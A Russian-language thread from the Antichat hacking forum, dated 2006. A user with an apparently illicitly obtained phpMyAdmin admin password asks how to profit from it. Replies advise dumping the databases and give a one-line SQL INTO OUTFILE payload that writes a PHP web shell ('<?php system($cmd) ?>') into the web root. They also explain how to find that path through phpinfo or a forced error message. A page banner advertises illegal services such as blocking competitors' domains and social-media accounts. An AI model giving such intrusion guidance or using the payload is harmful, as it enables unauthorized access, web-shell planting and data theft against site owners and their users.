Форум АНТИЧАТ - phpMyAdmin 2.6.4-pl3 есть пароль. Что делать?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
phpMyAdmin 2.6.4-pl3 есть пароль. Что делать?

Опции темы

Поиск в этой теме

Опции просмотра

phpMyAdmin 2.6.4-pl3 есть пароль. Что делать?

26.10.2006, 17:47

m2infect

Познающий

Регистрация: 20.06.2006

Сообщений: 34

Провел на форуме:
140396

Репутация: 5

phpMyAdmin 2.6.4-pl3 есть пароль. Что делать?

Добрый день/вечер!

Аист принес мне записку, на которой был написан пароль от админки "phpMyAdmin 2.6.4-pl3".

Что можно сделать, кроме как понатыкать на разные кнопочки. Хочется поиметь какую-то выгоду...

С уважением.

26.10.2006, 17:52

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

сделай дамп баз... просмотреть базы можно коомандой Show Databases

26.10.2006, 19:39

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

шелл залей, если into outfile конечно разрешен.. вообще man sql!

__________________
ПИУ-ПИУ...

26.10.2006, 22:19

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

а у яндекса слабо спросить? да хоть

Цитата:

_http://www.securitylab.ru/vulnerability/242774.php

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

27.10.2006, 09:44

m2infect

Познающий

Регистрация: 20.06.2006

Сообщений: 34

Провел на форуме:
140396

Репутация: 5

Цитата:

Сообщение от c411k

шелл залей, если into outfile конечно разрешен.. вообще man sql!

А можно подрбно описать, как проверить разрешен или нет.

Я так понял, что нужно

PHP код:


		
			
SELECT * FROM table INTO OUTFILE 'путь_к_файлу/файл';

Только вот куда он запишет. Скорее всего он запишет его не в корене WWW-сервера и просмотреть его я не смогу. Нужно узнать полный путь - куда сохранять файл.

Как узнать этот путь?
Кому "+"

27.10.2006, 10:00

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Там есть ссылочка "Показать информацию о PHP" глянь там есть путь в разделе "PHP Variables". Ну а дальше прикинь в какую папку может быть разрешена запись.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

27.10.2006, 17:16

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

Узнаешь DOCUMENT_ROOT, потом

Цитата:

select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'

Если хватит прав на запись ..

27.10.2006, 18:47

Morph

Постоянный

Регистрация: 13.08.2004

Сообщений: 957

Провел на форуме:
1770063

Репутация: 429

Попробуй зайти в файлик theme.php?themes=sosatpalec или theme и вылезет ошибка кароче, вот те и путь.

Поидее пароль рутовый должен быть чтобы инто оутфайл сделать.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Наша служба и опасна и трудна)	Copyright_2000	Болталка	10	28.05.2008 19:20
Сексуальные новости 2003 года	Рогатый Трупоед	Болталка	9	23.10.2007 00:24
Faq по Icq-хакингу	ОТЕЦ	ICQ	3	11.01.2007 16:26
Правда о докторе Айболите	Дрэгги	Болталка	17	30.09.2006 13:34
С чего начинается достойный проект	ОТЕЦ	Чужие Статьи	2	28.09.2006 08:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход